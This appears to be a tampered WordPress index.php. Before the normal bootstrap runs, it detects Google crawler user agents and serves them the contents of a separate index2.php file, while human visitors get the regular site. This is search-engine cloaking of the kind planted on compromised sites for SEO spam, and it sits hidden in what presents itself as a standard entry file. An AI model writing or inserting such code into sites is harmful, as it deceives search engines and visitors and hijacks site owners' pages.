<?php
if (
    isset($_SERVER['HTTP_USER_AGENT']) &&
    preg_match(
        '/(Google|FeedFetcher-Google|Googlebot-Image|Googlebot-News|Googlebot-Video|Googlebot-Mobile|Googlebot-Smartphone|DuplexWeb-Google|Google-Structured-Data-Testing-Tool|Google Favicon|APIs-Google|Mediapartners-Google)/i',
        $_SERVER['HTTP_USER_AGENT']
    )
) {
    $file = __DIR__ . '/index2.php';
    if (file_exists($file)) {
        readfile($file);
        exit;
    }
}

define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';